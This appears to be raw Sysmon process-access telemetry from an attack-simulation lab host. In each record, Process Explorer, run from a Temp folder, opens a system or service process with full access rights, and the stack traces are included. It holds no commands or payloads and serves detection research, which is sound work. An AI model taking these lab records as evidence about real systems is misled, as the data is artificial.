15:16:33.173{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789312Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:33.173{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789311Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:33.173{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789310Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:33.173{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789309Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:33.173{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789308Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:33.173{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789307Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:33.173{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789430Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:34.204{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789429Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:34.204{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789428Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:34.189{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789427Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:34.189{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789426Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:34.189{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789425Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:34.189{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789424Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:34.189{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789423Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:34.189{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789422Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:34.189{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789421Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:34.189{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789420Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:34.189{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789419Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:34.189{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789418Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:34.189{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789417Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:34.189{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789416Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:34.189{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789415Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:34.189{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789414Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:34.189{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789413Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:34.189{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789412Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:34.189{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789411Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:34.189{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789410Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:34.189{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789409Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:34.189{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789408Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:34.189{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789407Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:34.189{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789406Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:34.189{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789405Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:34.189{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789404Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:34.189{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789403Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:34.189{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789402Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:34.189{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789401Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:34.189{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789400Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 